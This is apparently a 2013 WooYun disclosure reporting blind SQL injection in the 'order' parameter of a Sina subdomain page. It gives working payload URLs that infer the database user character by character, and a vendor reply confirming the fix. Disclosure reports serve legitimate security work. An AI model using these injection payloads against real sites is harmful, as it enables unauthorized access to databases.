漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2013-07-09: 细节已通知厂商并且等待厂商处理中
2013-07-09: 厂商已经确认,细节仅向厂商公开
2013-07-19: 细节向核心白帽子及相关领域专家公开
2013-07-29: 细节向普通白帽子公开
2013-08-08: 细节向实习白帽子公开
2013-08-23: 细节向公众公开
简要描述:
新浪某分站sql注入
详细说明:
1:缺陷url
http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc
2:缺陷参数 order
3:http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc,if(116>115),1,(select%201%20from%20information_schema.tables))
4:http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc,if(116<115),1,(select%201%20from%20information_schema.tables))
5:http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc,if((ascii(mid(current_user(),1,1))>115),1,(select%201%20from%20information_schema.tables))
显示错误
http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc,if((ascii(mid(current_user(),1,1))>114),1,(select%201%20from%20information_schema.tables))
显示正常
猜解当前用户,第一个字符的ascii为115
漏洞证明:
3:http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc,if(116>115),1,(select%201%20from%20information_schema.tables))
4:http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc,if(116<115),1,(select%201%20from%20information_schema.tables))
修复方案:
过滤!
版权声明:转载请注明来源 MayIKissYou@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2013-07-09 17:42
厂商回复:
感谢关注新浪安全,已安排人员进行修复。
最新状态:
暂无